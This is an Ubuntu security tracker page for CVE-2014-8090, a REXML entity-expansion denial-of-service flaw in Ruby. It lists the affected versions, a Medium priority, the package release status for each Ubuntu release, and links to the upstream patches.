Your submission was sent successfully! Close

CVE-2014-8090

Published: 14 November 2014

The REXML parser in Ruby 1.9.x before 1.9.3 patchlevel 551, 2.0.x before 2.0.0 patchlevel 598, and 2.1.x before 2.1.5 allows remote attackers to cause a denial of service (CPU and memory consumption) a crafted XML document containing an empty string in an entity that is used in a large number of nested entity references, aka an XML Entity Expansion (XEE) attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-1821 and CVE-2014-8080.

Priority

Medium

Status

Package Release Status
ruby1.8
Launchpad, Ubuntu, Debian
lucid Ignored
(reached end-of-life)
precise
Released (1.8.7.352-2ubuntu1.6)
trusty Does not exist

upstream Needs triage

utopic Does not exist

vivid Does not exist

wily Does not exist

ruby1.9.1
Launchpad, Ubuntu, Debian
lucid Ignored
(reached end-of-life)
precise
Released (1.9.3.0-1ubuntu2.10)
trusty Does not exist
(trusty was released [1.9.3.484-2ubuntu1.2])
upstream Needs triage

utopic Ignored
(reached end-of-life)
vivid Ignored
(reached end-of-life)
wily Does not exist

Patches:
upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48406 (1.9.3)



ruby2.0
Launchpad, Ubuntu, Debian
lucid Does not exist

precise Does not exist

trusty Does not exist
(trusty was released [2.0.0.484-1ubuntu2.2])
upstream Needs triage

utopic
Released (2.0.0.484+really457-3ubuntu1.2)
vivid Does not exist

wily Does not exist

Patches:

upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48403 (2.0)


ruby2.1
Launchpad, Ubuntu, Debian
lucid Does not exist

precise Does not exist

trusty Does not exist

upstream Needs triage

utopic
Released (2.1.2-2ubuntu1.2)
vivid
Released (2.1.2-2ubuntu3)
wily
Released (2.1.2-2ubuntu3)
Patches:


upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48402 (trunk)
upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48404 (2.1)